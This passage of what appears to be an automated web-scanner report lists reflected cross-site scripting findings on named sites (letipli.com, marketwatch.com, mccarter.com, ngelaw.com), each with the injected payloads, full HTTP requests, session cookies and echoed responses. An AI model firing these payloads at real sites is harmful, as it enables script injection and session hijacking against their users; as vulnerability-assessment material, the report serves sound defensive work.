<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:l
...[SNIP]...
<form method="post" action="http://www.hartfordbusiness.com/news14300.html8d3ba"><script>alert(1)</script>22db1e31600#comments" class="fs_form fill" id="comment_form">
...[SNIP]...
5.19. http://www.letipli.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 631ac--><script>alert(1)</script>0c466881b13 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico631ac--><script>alert(1)</script>0c466881b13 HTTP/1.1
Host: www.letipli.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ASPSESSIONIDACRSARSQ=PKIPPPGAJLLHAGEDEMMHOPGO

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 13 May 2011 00:48:45 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Content-Length: 18000
Content-Type: text/html
Expires: Thu, 12 May 2011 00:48:44 GMT
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="robots" conte
...[SNIP]...
<!-- ############# /favicon.ico631ac--><script>alert(1)</script>0c466881b13 -->
...[SNIP]...
5.20. http://www.letipli.com/member_details.asp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.letipli.com
Path:   /member_details.asp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 8e4b7--><script>alert(1)</script>76ff3e246a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /member_details.asp8e4b7--><script>alert(1)</script>76ff3e246a7 HTTP/1.1
Host: www.letipli.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:02:26 GMT
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l on "2005.03.25T13:09-0500" exp "2006.03.25T12:00-0500" r (v 0 s 0 n 0 l 0))
Connection: close
Content-Length: 16792
Content-Type: text/html
Expires: Wed, 11 May 2011 17:02:26 GMT
Set-Cookie: ASPSESSIONIDACRSARSQ=NDIOPPGAEEJNPIBMFJKNCIBF; path=/
Cache-control: Private

<!-- ASP/SQL Dynamic Content Copyright 2001-2011 RK.Net, Inc. --><!-- NO PREVIEW ID: -->
<html>
<head>
<title>LeTip Business Networking on Long Island, New York</title>

<meta name="robots" conte
...[SNIP]...
<!-- ############# /member_details.asp8e4b7--><script>alert(1)</script>76ff3e246a7 -->
...[SNIP]...
5.21. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 820c9'%3b341cec042cb was submitted in the REST URL parameter 1. This input was echoed as 820c9';341cec042cb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news820c9'%3b341cec042cb/story/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp03
Date: Thu, 12 May 2011 16:55:36 GMT
Content-Length: 47979

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news820c9';341cec042cb/story/therese-polettis-tech-tales-ebay/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...
5.22. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf15'%3b1be7beea177 was submitted in the REST URL parameter 2. This input was echoed as 4bf15';1be7beea177 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/story4bf15'%3b1be7beea177/therese-polettis-tech-tales-ebay/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp05
Date: Thu, 12 May 2011 16:55:38 GMT
Content-Length: 47962

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/story4bf15';1be7beea177/therese-polettis-tech-tales-ebay/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...
5.23. http://www.marketwatch.com/news/story/therese-polettis-tech-tales-ebay/story.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /news/story/therese-polettis-tech-tales-ebay/story.aspx

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27255'%3b1bfa3236508 was submitted in the REST URL parameter 3. This input was echoed as 27255';1bfa3236508 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news/story/therese-polettis-tech-tales-ebay27255'%3b1bfa3236508/story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 13-May-2011 04:59:59 GMT; path=/
X-MACHINE: sbkdfpswebp05
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 16:55:39 GMT
Content-Length: 47989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/news/story/therese-polettis-tech-tales-ebay27255';1bfa3236508/story.aspx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...
5.24. http://www.mccarter.com/new/homenew.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9c236--><script>alert(1)</script>ec7143486da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new/homenew.aspx?9c236--><script>alert(1)</script>ec7143486da=1 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:10:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=uzkyef2x3acjgpfcgsg5xca2; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 47609


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
intImg" border=0 onmouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('/new/homenew.aspx?9c236--><script>alert(1)</script>ec7143486da=1&PrintPage=True','PrintPage','scrollbars=yes,menubar=yes,width=660,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...
5.25. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into an HTML comment. The payload db0cb-->fb4f1fe73a0 was submitted in the searchlink parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /new/homenew.aspx?searchlink=searchnewdb0cb-->fb4f1fe73a0 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43785


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
ouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('/new/homenew.aspx?searchlink=searchnewdb0cb-->fb4f1fe73a0&PrintPage=True','PrintPage','scrollbars=yes,menubar=yes,width=660,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...
5.26. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb9d9"style%3d"x%3aexpr/**/ession(alert(1))"514872699ba was submitted in the searchlink parameter. This input was echoed as fb9d9"style="x:expr/**/ession(alert(1))"514872699ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /new/homenew.aspx?searchlink=fb9d9"style%3d"x%3aexpr/**/ession(alert(1))"514872699ba HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
<IFRAME style=" bgcolor:#969696;height:530px;width:450px;margin-top:4px;overflow-x: hidden;z-index:1;left:0px" src="fb9d9"style="x:expr/**/ession(alert(1))"514872699ba.aspx" frameborder=0 name="overview" style="FILTER: chroma (color=00FF80)">
...[SNIP]...
5.27. http://www.mccarter.com/new/homenew.aspx [searchlink parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mccarter.com
Path:   /new/homenew.aspx

Issue detail

The value of the searchlink request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59747"style%3d"x%3aexpr/**/ession(alert(1))"9b4792d76c9 was submitted in the searchlink parameter. This input was echoed as 59747"style="x:expr/**/ession(alert(1))"9b4792d76c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /new/homenew.aspx?searchlink=searchnew59747"style%3d"x%3aexpr/**/ession(alert(1))"9b4792d76c9 HTTP/1.1
Host: www.mccarter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mccarter.com/new/homenew.aspx?9c236--%3E%3Cscript%3Ealert(%22OOPS%22)%3C/script%3Eec7143486da=1
Cookie: ASPSESSIONIDQCACQABB=OKLLAFKBNJLCBGNOEOBIADKB; ASP.NET_SessionId=xsyokce4xrhmr5452u2baz45

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:16:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 43936


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">


<HTML>
   <HEAD>
       <title>Welcome to McCarter</title>
       
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...
t" id="printImg" border=0 onmouseover="this.src='images/New Mccarter/Footer/printpage_rollover.jpg'" onmouseout="this.src='images/New Mccarter/Footer/printpage.jpg'" onClick="MM_openBrWindow('searchnew59747"style="x:expr/**/ession(alert(1))"9b4792d76c9.aspx?PrintPage=True&mode=&sortby=','PrintPage','scrollbars=yes,menubar=yes,width=700,height=530');return false;" src="images/New Mccarter/Footer/printpage.jpg">
...[SNIP]...
5.28. http://www.ngelaw.com/about/honors_awards.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /about/honors_awards.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a81f7"><script>alert(1)</script>4d4e89dfd1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/honors_awards.aspx?a81f7"><script>alert(1)</script>4d4e89dfd1=1 HTTP/1.1
Host: www.ngelaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:15 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24237


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Honors & Awards</TITLE>
   </HEAD>
   <meta name="description" content=" Neal, Gerber & Eisenberg LLP is committed to excellence in both client
...[SNIP]...
<a href="http://www.ngelaw.com/about/honors_awards.aspx?a81f7"><script>alert(1)</script>4d4e89dfd1=1&print=true" target=_blank>
...[SNIP]...
5.29. http://www.ngelaw.com/attorney/attorney.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/attorney.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4bc93"><script>alert(1)</script>9db17f76a18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorney/attorney.aspx?4bc93"><script>alert(1)</script>9db17f76a18=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/news/event_detail.aspx?ID=688
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:25 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 18042


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Attorneys
            | Search
       </TITLE>
   </HEAD>
   
   <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="java
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/attorney.aspx?4bc93"><script>alert(1)</script>9db17f76a18=1&print=true" target=_blank>
...[SNIP]...
5.30. http://www.ngelaw.com/attorney/bio.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/bio.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a7e8"><script>alert(1)</script>6f7768e8c1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorney/bio.aspx?ID=1212&6a7e8"><script>alert(1)</script>6f7768e8c1=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/attorney/results.aspx?letter=M
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 17:56:04 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11687


<HTML>
   <HEAD>
       <TITLE>Neal, Gerber & Eisenberg LLP | Attorneys | Hillary A. Mann</TITLE>
   </HEAD>
   <meta name="description" content="Hillary A. Mann Hillary A. Mann is a member of Neal Gerber
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/bio.aspx?ID=1212&6a7e8"><script>alert(1)</script>6f7768e8c1=1&print=true" target=_blank>
...[SNIP]...
5.31. http://www.ngelaw.com/attorney/results.aspx [letter parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/results.aspx

Issue detail

The value of the letter request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 373ca"style%3d"x%3aexpr/**/ession(alert(1))"25abb64fc21 was submitted in the letter parameter. This input was echoed as 373ca"style="x:expr/**/ession(alert(1))"25abb64fc21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /attorney/results.aspx?letter=M373ca"style%3d"x%3aexpr/**/ession(alert(1))"25abb64fc21 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ngelaw.com/attorney/attorney.aspx
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:57:55 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9896


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Attorneys | Attorney Search Results</title>
       
       <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="jav
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/results.aspx?letter=M373ca"style="x:expr/**/ession(alert(1))"25abb64fc21&print=true" target=_blank>
...[SNIP]...
5.32. http://www.ngelaw.com/attorney/results.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /attorney/results.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8fa1"><script>alert(1)</script>976646c203e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /attorney/results.aspx?c8fa1"><script>alert(1)</script>976646c203e=1 HTTP/1.1
Host: www.ngelaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ASP.NET_SessionId=ilrj1lafytmill551eimjf45;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 12 May 2011 16:56:08 GMT
X-Powered-By: ASP.NET
x-client: 000080
x-apptype: 01
x-prodtype: 07
Connection: close
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 63415


<HTML>
   <HEAD>
       <title>Neal, Gerber & Eisenberg LLP | Attorneys | Attorney Search Results</title>
       
       <link rel="stylesheet" href="/include/main.css" type="text/css">
       <script language="jav
...[SNIP]...
<a href="http://www.ngelaw.com/attorney/results.aspx?c8fa1"><script>alert(1)</script>976646c203e=1&print=true" target=_blank>
...[SNIP]...
5.33. http://www.ngelaw.com/news/detail.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ngelaw.com
Path:   /news/detail.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e47"><script>alert(1)</script>7d1b9346f7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/detail.aspx?ID=1125&72e47"><script>alert(1)</script>7d1b9346f7e=1 HTTP/1.1
Host: www.ngelaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
